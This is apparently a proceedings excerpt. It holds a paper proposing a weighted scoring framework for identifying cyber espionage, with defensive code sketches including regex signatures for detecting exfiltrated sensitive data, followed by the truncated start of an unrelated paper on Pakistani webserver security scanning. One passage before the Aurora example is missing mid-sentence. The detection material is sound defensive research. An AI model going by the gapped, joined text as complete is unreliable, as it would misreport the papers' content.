Abstract: Espionage has existed in many forms for as long as humans have kept secrets. With the skyrocketing growth of digital data storage, cyber espionage has quickly become the tool of choice for corporate and government spies. Cyber espionage typically occurs over the Internet with a consistent methodology: 1) infiltrate a targeted network, 2) install malware on the targeted victim(s), and 3) exfiltrate data at will. Detection methods exist and are well researched for these three realms: network attack, malware, and data exfiltration. However, no formal methodology exists for identifying cyber espionage as its own classification of cyber attack. This paper proposes a synthesis approach for identifying targeted espionage by fusing the intelligence gathered from current detection techniques. This synthesis of detection methods establishes a formal decision-making framework for determining the likelihood of cyber espionage.

Keywords: covert channel, cyber espionage, data exfiltration, intrusion detection, malware analysis

1. Introduction and background

The cyber espionage threat is real. Because of the low cost of entry into, and the anonymity afforded by, the Internet realm, any curious or incentivized person can steal secret information from private computer networks (US-China, 2008). If a spy steals proprietary knowledge of a private company's innovative product research and development, this data holds a high monetary value, reportedly billions of dollars, to an industry competitor (Epstein, 2008). If the stolen information is sensitive to national defense or national strategy decision-making, then its value is arguably immeasurable.

A consistently effective defense against cyber espionage requires a consistently effective way to identify it. While there are methodologies to detect facets of cyber espionage, there is no formal approach for identifying cyber espionage as a stand-alone network event classification in its own right. This paper proposes a new approach that synthesizes current cyber warfare detection and analysis techniques into a framework that holistically identifies malicious or suspicious network events as cyber espionage.

Due to the myriad of network attack methods and traditional espionage techniques, this paper cannot comprehensively address all techniques that a cyber spy could employ to achieve his mission (e.g., insider threat or physical access). Instead, the paper focuses on the most common method of performing cyber espionage from a remote location outside the victim's local network. Historically, the most common method for infiltrating a network for this purpose is through targeted spear-phishing emails with malicious file attachments (SANS Institute, 2008). Both the emails and the attachments are products of effective social engineering that tailors the content to the recipients. When an unsuspecting, targeted user opens the attachment, the malware, and therefore the cyber spy, establishes a foothold on the computer and the affected network. The spy can then use his specialized malware to search for interesting data on the victim computer and network, and exfiltrate this potentially sensitive data from the victim network to a place of his choosing.

The synthesis approach and decision-making framework proposed in this paper allow a network defender to correctly identify this kind of targeted cyber espionage event. If this methodology is to catch cyber spies targeting specific victims, then the detection approach must examine each malicious activity (i.e., network infiltration, malware installation, and data exfiltration) within the context of the whole espionage event. This approach does not attempt to introduce new ways to detect network attacks, malware infections, or data exfiltration beyond the bounds of the current field of research. Rather, current detection methods are integrated in a new way that yields a synthesis approach to categorizing cyber espionage events. The paper first discusses techniques to detect each of the spy's three steps to espionage success, and then the synthesis approach and resulting framework are explained. Section 2 reviews network infiltration detection methods. Section 3 looks at detecting malware on a computer. Section 4 discusses the detection of data exfiltration. Section 5 poses the synthesis detection approach, followed by a conclusion and discussion of future work in Section 6.

2. Network infiltration detection<br />

David Merritt and Barry Mullins<br />

Intrusion detection helps us answer the question: “Is there a malicious intrusion into the network?”<br />

Because there are countless manual and automated mechanisms to identify suspicious network<br />

behavior, this section will only discuss the most common techniques for intrusion detection. This<br />

glimpse into intrusion detection serves as a backdrop for the explanation of the synthesis approach,<br />

which assumes that network infiltration can be detected somewhat reliably.<br />

A network-based intrusion detection system (NIDS) detects network-oriented attacks and traditionally<br />

monitors the access points into a network. If a cyber spy chooses a common network attack method<br />

to infiltrate a network, such as a common buffer overflow exploit, then the NIDS will have a high<br />

detection success rate (Patcha and Park, 2007: 3448-3470). If there is a novel or sophisticated attack<br />

that is difficult to detect, a NIDS relies on its anomaly detection capability. Kuang and Zulkernine (2008:<br />

921-926) have shown that an anomaly-based NIDS employing the Combined Strangeness and<br />

Isolation measure K-Nearest Neighbors algorithm can accurately identify novel attacks at a detection<br />

rate of 94.6%, where the detection rate is defined as the ratio of correctly classified network intrusion<br />

samples to the total number of samples.<br />
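The CSI-KNN algorithm combines strangeness and isolation measures; as a simplified illustration of the underlying distance-based idea (this sketch is not the published algorithm, and the feature vectors are hypothetical), an anomaly score can be computed from a sample's nearest neighbours in a baseline of normal traffic:<br />

```python
import math

def knn_anomaly_score(sample, baseline, k=3):
    """Mean Euclidean distance from `sample` to its k nearest
    neighbours in `baseline` (a list of feature vectors built from
    normal traffic). Higher scores mean less like normal traffic."""
    dists = sorted(math.dist(sample, ref) for ref in baseline)
    return sum(dists[:k]) / k

# Hypothetical per-host features: (packets/sec, mean payload bytes, distinct ports)
normal = [(10, 500, 3), (12, 480, 2), (9, 510, 3), (11, 495, 4)]

benign = (10, 502, 3)   # resembles the baseline
probe = (200, 40, 60)   # port-scan-like behaviour

print(knn_anomaly_score(benign, normal))  # small
print(knn_anomaly_score(probe, normal))   # large
```

A score far above those of baseline samples suggests anomalous, possibly novel, attack traffic; the real algorithm adds per-class strangeness and isolation measures and a classification step.<br />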

3. Malware detection<br />

Malware detection helps us answer the question: “Is there something malicious happening on a<br />

host?” This section is not an exhaustive survey of all malware detection mechanisms and methods.<br />

Rather, it simply makes evident the fact that there are numerous ways to reliably detect most malware<br />

on a system. Malware comes in many forms with many names. For simplicity and convenience, we<br />

will refer to any unwanted and malicious program or code running on a system as malware. Naturally,<br />

detection of unknown malware is the goal, assuming the cyber spy will use sophisticated, novel<br />

malicious programs to establish footholds on a computer and within a network.<br />

3.1 Antivirus<br />

Antivirus, or anti-malware, software does not need much explanation as it is a commonly used and<br />

moderately understood term. Antivirus products rely primarily on signature-based detection, although<br />

most products have integrated at least a rudimentary mechanism for behavioral analysis of<br />

executables. The vast majority of known malware is caught by commodity software. As a point of<br />

reference, most antivirus products have proven they can detect malware in sample sizes of over one<br />

million with accuracy in the upper 90th percentile (Virus Bulletin, 2008).<br />
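At its core, signature-based detection is a lookup of a file's fingerprint against a database of known-bad samples. A minimal sketch (the digest set and sample bytes here are hypothetical):<br />

```python
import hashlib

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# Hypothetical signature database: digests of previously analyzed samples.
KNOWN_BAD = {sha256_hex(b"placeholder bytes of a known-bad sample")}

def is_known_malware(file_bytes: bytes) -> bool:
    # Exact-match signatures: any single-byte change defeats the lookup,
    # which is why signature-based AV struggles with novel malware.
    return sha256_hex(file_bytes) in KNOWN_BAD
```

The exact-match nature of such signatures is why novel or polymorphic malware, the kind a cyber spy would favour, evades them; behavioural analysis fills part of that gap.<br />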

3.2 Malware analysis<br />

There are historically two methods of analyzing unknown programs, or binaries: static and dynamic<br />

(Ding et al, 2009: 72-77). Static analysis starts with the conversion of a program from its binary<br />

representation to a more symbolic, human-readable version of assembly code instructions. This<br />

disassembly ideally takes into account all possible code execution paths of the unknown program,<br />

which provides a reverse engineer with the complete set of program instructions and therefore inner<br />

workings of the unknown program’s code. Analyzing this code to discover a program’s purpose and<br />

capabilities makes up the bulk of static analysis. Christodorescu et al (2005: 32-46) and Kruegel,<br />

Robertson and Vigna (2004: 91-100) discuss a couple of effective approaches to using this kind of<br />

analysis to detect and classify unknown malware.<br />

On the other hand, analyzing the code during execution is called dynamic analysis. Dynamic analysis<br />

is effective against binaries that obfuscate themselves or are self-modifying, because every program<br />

must ultimately run on a system, and while it runs, its behavior<br />

and subsequent system modifications can be seen. Willems, Holz and Freiling (2007: 32-39) and<br />

Bayer et al (2006: 67-77) discuss dynamic analysis techniques that are successful in detecting<br />

unknown malware. Also, Rieck et al (2008: 108-125) used a learning based approach to automatically<br />

classify 70% of over 3,000 previously undetected malware binaries.<br />

4. Data exfiltration detection<br />

Data exfiltration detection helps us answer the question: “Is someone stealing data off the network?”<br />

Detecting suspicious and outright malicious events in the realm of data exfiltration is arguably the<br />

most difficult but most important to achieve out of the three steps of cyber espionage. Because the<br />

existence of a computer network implies the need for data to be accessed both inbound to and<br />

outbound from a network, the task of identifying a “bad” stream of data leaving the network amidst a<br />

flood of “good” data is daunting.<br />

Many convenient overt channels exist on the Internet. With a significant bulk of network traffic on<br />

any given local network being Internet-related, any web-based protocol offers a readily available overt<br />

channel within which a spy can easily exfiltrate stolen data. The sheer amount of web traffic makes it<br />

easy to hide the communication channel—the data is just one animal in a herd at that point.<br />

Fortunately, custom signatures can be generated for specific, sensitive data that would trigger a NIDS<br />

alert if this data were detected on its way out of a network (Liu, 2008).<br />
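As a sketch of such content signatures (the patterns below are illustrative, not taken from Liu et al.), outbound payloads can be matched against expressions describing sensitive data:<br />

```python
import re

# Hypothetical signatures for sensitive content in outbound payloads.
SIGNATURES = {
    "ssn": re.compile(rb"\b\d{3}-\d{2}-\d{4}\b"),          # US SSN format
    "marking": re.compile(rb"PROPRIETARY|COMPANY CONFIDENTIAL"),
}

def match_exfil_signatures(payload: bytes):
    """Return the names of all signatures that fire on an outbound payload."""
    return [name for name, pat in SIGNATURES.items() if pat.search(payload)]
```

Plaintext signatures are defeated as soon as the spy encrypts or encodes the data, which is one reason covert and encrypted channels require separate treatment.<br />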

Thanks to several innovative research efforts, it is possible to detect many kinds of covert channels.<br />

Gianvecchio and Wang (2007) use a corrected conditional entropy (CCE) approach to accurately<br />

detect covert timing channels in HTTP (hypertext transfer protocol) traffic. Similarly, Cabuk, Brodley,<br />

and Shields (2009) use a measure of compressibility to distinguish covert timing channel traffic from<br />

conventional web-based traffic. While there are a multitude of other types of covert channels, like<br />

those using packet header fields or timestamps, there are approaches to eliminate, reduce, or at least<br />

detect these (Zander, Armitage, and Branch, 2007: 44-57).<br />
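The compressibility measure of Cabuk, Brodley, and Shields rests on the observation that covert timing channels produce unusually regular inter-packet delays. A minimal sketch of that idea (the parameter choices and traffic samples are illustrative):<br />

```python
import random
import zlib

def compressibility(inter_arrival_times, precision=3):
    """Quantize inter-packet delays, concatenate them as text, and
    measure how well the result compresses. Regular timing patterns
    (as produced by a covert timing channel) compress far better
    than the natural jitter of ordinary traffic."""
    s = ",".join(f"{t:.{precision}f}" for t in inter_arrival_times).encode()
    return 1 - len(zlib.compress(s, 9)) / len(s)

random.seed(1)
normal = [random.expovariate(10) for _ in range(500)]    # jittery, web-like delays
covert = [0.1 if bit else 0.2 for bit in [1, 0] * 250]   # binary timing channel

print(compressibility(covert))   # close to 1: highly regular
print(compressibility(normal))   # noticeably lower
```

A score near 1 indicates highly regular, and therefore suspicious, timing; natural traffic jitter compresses far less.<br />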

5. Synthesis detection approach<br />

From the perspective of preventing the compromise of sensitive information, it is crucial to determine<br />

if anomalous, suspicious, or malicious occurrences are part of a cyber espionage attempt or not. In<br />

other words, to prevent cyber espionage, one must first be able to identify it reliably. However, there is<br />

a surprising lack of research focused on identifying or labeling network events as cyber espionage.<br />

The Defense Personnel Security Research Center (PERSEREC) produced a technical report in 2002<br />

on 150 cases of espionage against the United States by American citizens (Herbig and Wiskoff,<br />

2002). The Defense Intelligence Agency's (DIA) Counterintelligence and Security Activity (DAC) used<br />

the results of PERSEREC's report to produce a guide to aid its employees in reporting potential<br />

espionage-related behaviors in their colleagues (Office 2007). Essentially, the DIA relies on a<br />

synthesis of indicators to aid in its detection of spies.<br />

This paper adopts the same synthesis approach to detecting cyber espionage. Operating under the<br />

premise that cyber espionage emits telltale signs, the search for these indicators begins by looking at<br />

a series of questions with, hopefully, intuitive and obvious answers that lead to a framework of<br />

measurement.<br />

5.1 How would a spy infiltrate a network?<br />

If an attacker were only concerned with gaining access into a network, he would justifiably launch as<br />

many attacks against as many victims as possible. This increases his likelihood of success. But this<br />

torrent of binary madness will also draw much attention. A cyber spy who intends to steal sensitive<br />

information from a network will typically take a more streamlined avenue into the network, one that is<br />

less noisy and has a higher probability of success. This mentality and intention will drive the spy to<br />

use more strategy in choosing his attack tools and methods. Also, based on the spy’s knowledge of<br />

his victims and his desire to evade detection, he will target a relatively small number of victim<br />

systems. Spear phishing emails sent to a handful of selected victims are indicative of espionage. In<br />

addition, if the content of the email is tailored to be very specific and relevant to the industry, then this<br />

would be a telltale sign of cyber espionage. This thought process reveals a couple of indicators we can<br />

use to distinguish network intrusions that are highly probable espionage events from those that are<br />

not: targeted and tailored.<br />

5.2 What kind of malware would a spy use?<br />

If an attacker just wanted to infect as many machines as possible to expand his ever-growing botnet,<br />

this attacker's malware of choice would eventually run rampant and widespread across the Internet, or<br />

else it would not accomplish its master's goal. Looking at the other end of the spectrum, assuming a<br />

spy would want to evade detection and maintain persistent, reliable access to data, the spy would<br />

probably choose malware that is not easily detectable. Malware that is very well known is likely not<br />

the strategically-chosen tool of a cyber spy. In addition, since the name of the espionage game is to<br />

obtain information, it would make sense for espionage-related malware to have some sort of data-gathering<br />

functionality. Furthermore, if the malware is sophisticated enough to change tactics or focus<br />

on certain information upon receiving new commands from the attacker, then this would be an even<br />

stronger indicator of espionage. Essentially, we have established two more indicators to find probable<br />

espionage malware: detectability and information-gathering.<br />

5.3 How would a spy exfiltrate data?<br />

We have already discussed that there are many ways to move data out of a network. In fact, the ease<br />

of data transfer is an underlying measure of network usefulness. If a typical network attacker were<br />

only concerned with collecting data regardless of who else sees it, then he may choose the most<br />

convenient avenue of data exfiltration. A cyber spy would want to follow the same mentality portrayed<br />

in his choice of network intrusion and malware infection techniques. That is, the spy would probably<br />

prefer to evade detection altogether, or at least attempt to hide his needle in the haystack of network<br />

traffic. In addition, the spy would most likely prefer to hide the data itself while it is transiting the<br />

network. Sending the stolen information over the network in clear text may reveal too much of his<br />

intent.<br />

Naturally, the spy would want to make his efforts worthwhile—the more data he can steal, the more<br />

worthwhile the mission. A spy who collects all information pertaining to a certain product will surely be<br />

sending relatively large amounts of data outbound, and his intentions would be difficult to detect if the<br />

data were encrypted. Clearly, very large amounts of encrypted data leaving a network warrant<br />

a closer look, and this method of data exfiltration seems fairly spy-like. If this data could be decrypted<br />

to uncover very specific information relevant to the industry, especially if it is private or proprietary,<br />

then this is surely a telltale sign of espionage. In fact, this metric of industry-specific information is a<br />

strong indicator by itself. But it may not always be possible to decrypt the data in a timely manner, so<br />

we must include this indicator with other indicators of data exfiltration.<br />

Inherently, hiding the very existence of a communication channel screams of the intent to evade<br />

detection and, thus, warrants a closer look. Suffice it to say that the use of a covert channel is very<br />

spy-like. Therefore, more espionage indicators have been uncovered pertaining to data exfiltration:<br />

channel covertness, transfer size, encryption, and relevance of information.<br />

5.4 Espionage identification framework<br />

The following is a summary of potential indicators for cyber espionage:<br />

Intrusion:<br />

Targeted with selective victims<br />

Tailored through social engineering<br />

Malware:<br />

Novel or unknown<br />

Information/data-stealer<br />

Exfiltration:<br />

Covert channel<br />

Encrypted data or channel<br />

Large amount of data<br />

Industry-specific information<br />

These indicators can be used as an objective framework for subjective decision-making concerning<br />

the probability of espionage for a given event. An overall event that satisfies every intrusion, malware,<br />

and exfiltration indicator is likely espionage-related, but a cyber espionage event may not explicitly<br />

fulfill each and every indicator. In other words, the absence of one of these indicators does not<br />

automatically preclude an overall event from being attributable to cyber espionage.<br />

Given this framework, if there is a way to detect and subsequently score each individual intrusion,<br />

malware, or exfiltration event, then one can calculate a synthesis of those scores to categorize the<br />

overall intrusion + malware + exfiltration event. Taken a step further, if this synthesis score is related<br />

to the probability of cyber espionage, it is possible to use this score to measure the probability of the<br />

entire event as being cyber espionage.<br />

It is important to note that an individual event detected by itself may not express outright if a<br />

circumstance is cyber espionage-related or not. A targeted, socially-engineered intrusion might be a<br />

sophisticated spam or phishing attempt. New and undetected information-stealing malware could be a<br />

new variant of benign adware. A consistent transfer of significant amounts of encrypted data could<br />

end up being an authorized VPN (virtual private network) connection. The subtlety of a covert channel<br />

may be difficult to detect or declare with certainty its intentions, but it does serve as an impetus to<br />

investigate further to determine the context of the channel.<br />

The advantage of this synthesis approach is that intrusion, malware, or exfiltration detection can<br />

be viewed within the context of the whole event. Not doing so could lead to incorrect conclusions<br />

being drawn from insufficient context. But each step of a cyber spy's attack methodology is not of<br />

equal value to the investigator. For instance, it is a challenge to judge the intent of malware simply by<br />

looking at its detectability and functionality. Many malicious programs have the same functionality but<br />

are used for different purposes. In fact, many legitimate programs are frequently used maliciously<br />

(e.g., Remote Administration Tools). In contrast, a targeted intrusion that is industry-relevant<br />

hints at the intentions of the adversary—to quietly get to specific targets. Thus, the intrusion factor<br />

should be weighted more than the malware “factor”. Similarly, with data exfiltration detection,<br />

covertness of the channel and sensitivity of the data are significant factors affecting the<br />

characterization of espionage. These factors should carry more weight than the malware<br />

installation factor.<br />

This strategic weighting of indicators is integrated to establish the Espionage Probability Matrix (EPM)<br />

framework, shown in Table 1. The EPM is used to determine an EPM score based on varying degrees<br />

of espionage probability, as indicated by the three columns of High, Medium, and Low Probability.<br />

Each indicator is assigned a value associated with its column, with High, Medium, and Low indicators<br />

being assigned values of 3, 2, and 1, respectively. The values for the indicators (e.g., targeted and<br />

tailored network intrusion) within each factor (e.g., Intrusion) are averaged to provide an EPM score<br />

for that factor. For example, a network intrusion that is not targeted at a specific user/group but<br />

contains somewhat tailored content results in an Intrusion factor EPM score of 1.5. This is calculated<br />

by averaging the “Not targeted” indicator (i.e., 1) with the “Potentially tailored” indicator (i.e., 2).<br />

Table 1: Espionage Probability Matrix (EPM)<br />

Intrusion:<br />

High Probability (3): Targeted; specific victims. Tailored; social engineering required.<br />

Medium Probability (2): Potentially targeted. Potentially tailored; social engineering may be used.<br />

Low Probability (1): Not targeted. Well-known methods.<br />

Malware:<br />

High Probability (3): Novel or unknown. Advanced info/data-stealer.<br />

Medium Probability (2): Not well known; variant of known. Info/data-stealer.<br />

Low Probability (1): Well known. Not info/data-stealer.<br />

Exfiltration:<br />

High Probability (3): Covert channel. Custom encryption. Significant data transfer. Industry-specific.<br />

Medium Probability (2): Attempts to hide channel. Standard encryption. Non-trivial data transfer. Partially industry-specific.<br />

Low Probability (1): No attempt to hide channel. Not encrypted. Negligible data transfer. Not industry-specific.<br />

The Intrusion row has an α multiplier, where α > 1, to represent the relative importance of intrusion<br />

classification to the overall EPM score. The Exfiltration row has a β multiplier, where β > 1, to<br />

represent the relative importance of data exfiltration classification to the overall EPM score. This<br />

effectively assigns greater importance to the factors that deserve it, as discussed. These individual<br />

probabilities are brought into context of the entire event by calculating an overall EPM score using the<br />

following equation:<br />

EPM Score = α·Intrusion + Malware + β·Exfiltration<br />
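The scoring mechanics can be expressed directly in code; the function names are illustrative, and α = 2 and β = 3 are the notional weights the paper adopts:<br />

```python
def factor_score(indicator_values):
    """Average the 3/2/1 indicator values observed for one factor.
    e.g. a not-targeted (1) but potentially tailored (2) intrusion
    averages to 1.5, as in the worked example above."""
    return sum(indicator_values) / len(indicator_values)

def epm_score(intrusion, malware, exfiltration, alpha=2, beta=3):
    # EPM Score = alpha * Intrusion + Malware + beta * Exfiltration
    return alpha * intrusion + malware + beta * exfiltration

print(factor_score([1, 2]))       # 1.5
print(epm_score(1.5, 2.0, 1.0))   # 8.0
```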

Essentially, summing the individual weighted scores yields a “grade” for intrusion, malware, and<br />

exfiltration classification taken within the context of one another. For the purpose of this paper, a<br />

notional α multiplier of 2 and a β multiplier of 3 are used to illustrate the effectiveness and flexibility of<br />

this synthesis approach. Operationally, these values can be fine-tuned and adjusted as needed.<br />

However, this score has little value without a translation to what it could mean. The EPM score is<br />

used in the Espionage Threshold Matrix (ETM), shown in Table 2.<br />

Table 2: Espionage Threshold Matrix (ETM), assuming α=2 and β=3<br />

Overall Probability of Cyber Espionage: EPM Score<br />

High Probability: ≥12<br />

Medium Probability: ≥9<br />

Low Probability: <9<br />


2010). The attackers use social engineering and target source code and intellectual property (Stamos<br />

2010: 1). This attack receives the maximum Intrusion and Malware EPM scores. In the absence of full<br />

details, we assume the exfiltration channel uses standard encryption, and the amount of data<br />

transferred is not significant from the perspective of each individual company. Exfiltration receives a<br />

score of 2.5 to produce an overall EPM score of 16.5. This is well above the threshold for high<br />

probability of cyber espionage, according to the ETM.<br />
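As an arithmetic check, the Aurora example can be reproduced from the EPM equation and the ETM thresholds of Table 2 (the variable names are illustrative):<br />

```python
alpha, beta = 2, 3                                   # notional weights from the paper
intrusion, malware, exfiltration = 3.0, 3.0, 2.5     # Aurora factor scores

score = alpha * intrusion + malware + beta * exfiltration
print(score)                                         # 16.5

# ETM thresholds from Table 2: >=12 high, >=9 medium, otherwise low.
if score >= 12:
    label = "High Probability"
elif score >= 9:
    label = "Medium Probability"
else:
    label = "Low Probability"
print(label)                                         # High Probability
```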

The scores of the EPM and thresholds of the ETM can be tuned according to a user's tolerance of<br />

false positives, false negatives, or strength of desire to prevent sensitive data loss. The ETM score<br />

can be a critical decision-making tool for network defenders and data owners who understand the<br />

importance of identifying cyber espionage using a reliable, consistent, and robust framework based<br />

on an innovative synthesis approach.<br />

6. Conclusion and future work<br />

This paper discusses the significant threat of cyber espionage and the importance of identifying and<br />

attributing activities to cyber espionage. The paper introduces a new synthesis approach and<br />

framework for identifying cyber espionage that fills the void in this research area due to the lack of<br />

formal methods for holistically determining cyber espionage events. This new approach capitalizes on<br />

current detection capabilities and integrates their results into a framework called the EPM. This<br />

framework takes into account the context of individual events to determine the likelihood of cyber<br />

espionage by using the ETM.<br />

Because this synthesis approach is the first formal methodology for categorizing holistic network<br />

events as cyber espionage, it raises several questions. Is this framework effective if all<br />

three steps of espionage cannot be detected or they are detected out of order (e.g., exfiltration is the<br />

initial indicator of a suspicious event)? As for effectiveness, how should it be measured, and is there a more<br />

effective or efficient algorithm or methodology for identifying cyber espionage? Is it possible to<br />

automate the entire model, or will manual, human-in-the-loop processes always be needed?<br />

To help answer these questions, this approach and framework should be implemented, tested,<br />

and analyzed. It will surely be helpful to create an automated system that gathers data, alerts, and<br />

other relevant information from network and host-based sensors as well as from human analysis and<br />

inputs. In addition, observing additional real-world espionage-related malware and network intrusions<br />

is important to measuring the effectiveness of this model and answering the questions posed above.<br />

Acknowledgements<br />

This research is funded by the Center for Cyberspace Research at the Air Force Institute of<br />

Technology and the 688th Information Operations Wing at Lackland Air Force Base, Texas. The views<br />

expressed in this paper are those of the authors and do not reflect the official policy or position of the<br />

United States Air Force, Department of Defense, or the U.S. Government.<br />

References<br />

Cabuk, S., Brodley, C. E. and Shields, C. ‘IP Covert Channel Detection’, ACM Trans. Information and Syst.<br />

Security, vol. 12, no. 4, article 22, Apr. 2009.<br />

Ding, J., Jin, J., Bouvry, P., Hu, Y. and Guan, H. ‘Behavior-based Proactive Detection of Unknown Malicious<br />

Codes’, 2009 4th Int. Conf. Internet Monitoring and Protection, Venice/Mestre, Italy.<br />

Epstein, K. (2008, Dec. 7) ‘U.S. Is Losing Global Cyber War, Commission Says’, BusinessWeek, [Online],<br />

Available: http://www.businessweek.com/bwdaily/dnflash/content/dec2008/db2008127_817606.htm?chan=top+news_top+news+index+-+temp_dialogue+with+readers.<br />

Gianvecchio, S. and Wang, H. ‘Detecting Covert Timing Channels: An Entropy-Based Approach’, Proc. 14th<br />

ACM Conf. on Computer and Communications Security, Alexandria, Virginia, October 28-31, 2007.<br />

Herbig, K. and Wiskoff, M. ‘Espionage Against the United States by American Citizens’, TRW Systems, Defense<br />

Personnel Security Research Center, Monterey, CA, Tech. Rep. 02-5, July 2002.<br />

Keizer, G. (2010, Sep. 15) ‘Google hackers behind Adobe Reader PDF zero-day bug, Symantec warns’, [Online],<br />

Available: http://news.techworld.com/security/3239606/google-hackers-behind-adobe-reader-pdf-zero-daybug-symantec-warns/<br />

Kuang, L.L. and Zulkernine, M. ‘An anomaly intrusion detection method using the CSI-KNN Algorithm’, in Proc.<br />

2008 ACM Symposium on Applied Computing, Fortaleza, Ceara, Brazil, March 16-20.<br />

Liu, T., Corbett, C., Chiang, K., Archibald, R., Mukherjee, B. and Ghosal, D. ‘Detecting Sensitive Data Exfiltration<br />

by an Insider Attack’, Proc. 4th Annu. Workshop on Cyber Security and Information Intelligence Research:<br />

Developing Strategies to Meet Cyber Security and Information Intelligence Challenges Ahead, Oak Ridge,<br />

TN, May 12-14, 2008, vol. 288, no. 16.<br />

Office of the National Counterintelligence Executive (2007, Mar.) ‘Your Role in Combating the Insider Threat’,<br />

[Online], Available: http://www.ncix.gov/archives/docs/Your_Role_in_Combating_the_Insider_Threat.pdf.<br />

Patcha, A. and Park, J. M. “An overview of anomaly detection techniques: Existing solutions and latest<br />

technological trends,” Computer Networks, vol. 51, no. 12, Aug. 2007.<br />

Rieck, K., Holz, T., Willems, C., Dussel, P. and Laskov, P. ‘Lecture Notes in Computer Science’, Detection of<br />

Intrusions and Malware, and Vulnerability Assessment, vol. 5137, Berlin/Heidelberg, Germany: Springer,<br />

2008.<br />

SANS Institute (2008) ‘Top Ten Cyber Security Menaces for 2008’, [Online]. Available:<br />

http://www.sans.org/2008menaces/.<br />

Stamos, A. (2010) ‘”Aurora” Response Recommendations’, iSEC Partners, Inc.<br />

2008 Report to Congress, [Online], Available: http://www.uscc.gov/annual_report/2008/annual_report_full_08.pdf.<br />

Virus Bulletin Ltd. (2008, Sept. 2) ‘AV-Test Release Latest Results’, Virus Bulletin, [Online], Available:<br />

http://www.virusbtn.com/news/2008/09_02.<br />

Zander, S., Armitage, G., Branch, P. ‘A Survey of Covert Channels and Countermeasures in Computer Network<br />

Protocols’, IEEE Communications Surveys and Tutorials, vol. 9, no. 3, 2007.<br />

Zetter, K. (2010, Jan. 14) ‘Google hack attack was ultra sophisticated, new details show’, [Online], Available:<br />

http://www.wired.com/threatlevel/2010/01/operation-aurora/.<br />

Security Analysis of Webservers of Prominent<br />

Organizations of Pakistan<br />

Muhammad Naveed<br />

Free Lance Research, Pakistan<br />

mnaveed29@gmail.com<br />

Abstract: Insecure webservers are a serious threat to an organization’s reputation and resources. A successful attack<br />

on a webserver can destroy the trust of customers and others receiving services from the organization. Webservers<br />

were selected for this study because they provide an easily accessible entrance to the network from the Internet, and<br />

webserver security can be considered an index of an organization’s overall information security.<br />

This study analyzes the webservers of prominent organizations of Pakistan to assess their level of security.<br />

Webservers of different types of organizations were selected to provide a general view of the security of Pakistani<br />

webservers. The selected webservers belong to organizations that should be the first to secure their webservers, as<br />

they are the leaders in their respective fields in the country; smaller organizations can therefore be assumed to<br />

show even less concern for security. A benchmark for every type of organization was first established, against which<br />

the results of the analysis are compared. The Nmap scanner was used to scan the webservers for security threats. The results<br />

reveal that the webservers in Pakistan are not secure and that there is an urgent need for information security<br />

awareness in the country. The lack of importance given to information security can lead to cyber terrorism and<br />

cause serious trouble for the country.<br />

Keywords: information security, analysis, security threats, Webserver, Pakistan, Nmap<br />

1. Introduction and background<br />

Security is one of the fundamental requirements for each and every network, just like it is the<br />

requirement for each and every human. Without proper security, a network is just like a house without<br />

doors and windows. In case the network has a lot of valuable information and resources, it’s like a<br />

bank full of money without any guards or security cameras. Just as the bank in this example would be<br />

a prime target for theft or robbery, so it is with insecure networks. But there<br />

is a great difference in how people perceive an unsafe bank versus an insecure network. People don’t<br />

understand the ultimate consequences of insecure networks, and in Pakistan the situation is at its worst:<br />

businesses and individuals don’t even consider security an issue that merits attention.<br />

Negligence in information security can have terrible consequences. It is not difficult to imagine the<br />

chaos created if an ill-intentioned person gains access to the country’s most trusted news channel’s<br />

website. Suppose he adds a single headline claiming that a bomb has been placed at a specified<br />

place in the city or along some roadside: what trouble would people face? Or suppose<br />

he adds one line claiming the prime minister has said the country will soon attack its<br />

neighbor, which could end in a bloody feud between the two countries, or at least create<br />

misunderstandings and seriously damage relations between them.<br />

Trend Micro’s data-stealing malware focus report of June 2009 says, “In March 2008, data<br />

from 4.2 million credit card numbers were stolen in transmission as a result of malware installed on all<br />

of Hannaford Brothers’ servers in 300 stores”. (Trend Micro 2009) There are hundreds of other<br />

examples of attacks performed to achieve malicious objectives.<br />

The study analyzes the webservers of famous and most reputable organizations of the country. Three<br />

types of organizations were considered for the study: Education and Research, Commercial<br />

Organizations and News channels. A benchmark is first set by analyzing respected international<br />

organizations, whose analysis shows their webservers to be almost completely secure, so that the<br />

Pakistani results can be compared against it. Webservers of closely comparable Pakistani<br />

organizations were then analyzed to give an<br />

insight about the information security awareness in the country. Organizations selected for analysis<br />

should be first to implement security on the basis of their status and business capacity. Webservers<br />

were selected because they can be easily analyzed from the Internet, and analysis of webservers<br />

provides insight into the complete network security of the organization. The Nmap scanner was used to get<br />

the results. The identity of the Pakistani organizations analyzed is kept secret because of the possible<br />

damage to their reputation. However, it is simple to use the Nmap scanner to analyze any<br />

organization’s webserver, and many organizations of a similar type yield almost the same results.<br />

So, the results are basically an indicator of security awareness on a large scale.<br />
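The study’s scan results come from Nmap’s output; as an illustrative aid (this parser is a sketch, not part of the original study), the port table in Nmap’s normal output can be read with a few lines of code:<br />

```python
import re

# Matches port-table lines such as "80/tcp   open   http".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

def parse_nmap_ports(output: str):
    """Extract (port, protocol, state, service) tuples from Nmap's
    normal output; header and banner lines are skipped."""
    results = []
    for line in output.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service = m.groups()
            results.append((int(port), proto, state, service))
    return results

sample = """\
PORT     STATE    SERVICE
22/tcp   filtered ssh
80/tcp   open     http
3306/tcp open     mysql
"""
print(parse_nmap_ports(sample))
```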

The Pakistan Computer Emergency Response Team’s list of reported hacked Pakistani websites<br />

from 1999 to 2005 is available at (PakCert 2005). Statistics of hacked Pakistani websites are shown in<br />

Figure 1 (PakCert 2008). Recently, many important Pakistani websites were hacked, including the<br />

websites of the Supreme Court of Pakistan, the Pakistan Navy, and many other extremely<br />

important organizations (PakCert, 2005; PakCert, 2008; The Express Tribune, 2010; Jahanzaib,<br />

2010; GEO Pakistan, 2010; DawnNews, 2010).<br />

Figure 1: Statistics of hacked Pakistani websites (only .PK TLD) (PakCert (2008), ‘Defacement<br />

Statistics (January 1999 - August 2008)'’, Pakistan Computer Emergency Response<br />

Team)<br />

Paper is organized as: Section 2 gives the related work, section 3 shows the experimental setup used<br />

for the study, section 4 explains different port states shown by Nmap, section 5 sets the benchmarks<br />

for comparison, section 6 shows the actual analysis of web servers in Pakistan, and section 7<br />

concludes the paper and gives the simple solution to rectify the security problems.<br />

2. Related work

